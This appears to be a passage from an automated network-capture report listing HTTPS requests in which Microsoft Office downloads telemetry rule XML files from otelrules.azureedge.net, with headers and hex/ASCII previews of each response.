                                                                                                                                                                                                                                                              2024-11-27 15:32:04 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              96192.168.2.104980513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:04 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:04 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1393
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                              x-ms-request-id: e56afb1e-801e-0083-3991-3ff0ae000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153204Z-174f7845968xlwnmhC1EWR0sv80000000x200000000016fh
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:04 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              97192.168.2.104980813.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:04 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:04 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1358
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                              x-ms-request-id: ebed6b5e-401e-0015-4f72-400e8d000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153204Z-174f7845968pf68xhC1EWRr4h80000000xd00000000088ah
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:04 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              98192.168.2.104980913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:05 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:05 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1395
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                              x-ms-request-id: 9fc3e736-101e-0046-4391-3f91b0000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153205Z-174f7845968psccphC1EWRuz9s0000000xcg00000000avrh
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:05 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              99192.168.2.104981013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:06 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:06 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1358
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                              x-ms-request-id: 3452a663-f01e-003c-1f91-3f8cf0000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153206Z-174f7845968n2hr8hC1EWR9cag0000000wqg00000000mv6z
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:06 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              100192.168.2.104981213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:06 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:06 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1352
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                              x-ms-request-id: ee9d1ea0-001e-00a2-4791-3fd4d5000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153206Z-174f7845968j6t2phC1EWRcfe80000000xbg000000004u4w
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:07 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              101192.168.2.104981113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:06 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:06 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1389
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                              x-ms-request-id: ca68633c-201e-006e-1f8a-3fbbe3000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153206Z-174f7845968l4kp6hC1EWRe8840000000xc000000000bwbf
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:07 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              102192.168.2.104981313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:06 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:07 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1405
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                                              x-ms-request-id: fdde8523-d01e-0028-578c-3f7896000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153207Z-174f7845968xr5c2hC1EWRd0hn0000000e2g00000000188r
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:07 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              103192.168.2.104981413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:07 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:07 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1368
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                                              x-ms-request-id: e544c55f-801e-0083-3181-3ff0ae000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153207Z-174f7845968g6hv8hC1EWR1v2n000000052000000000btbt
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:07 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              104192.168.2.104981513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:08 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:08 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1401
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                                              x-ms-request-id: f1905457-c01e-0066-4580-3fa1ec000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153208Z-174f78459685m244hC1EWRgp2c0000000wx000000000hhvy
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
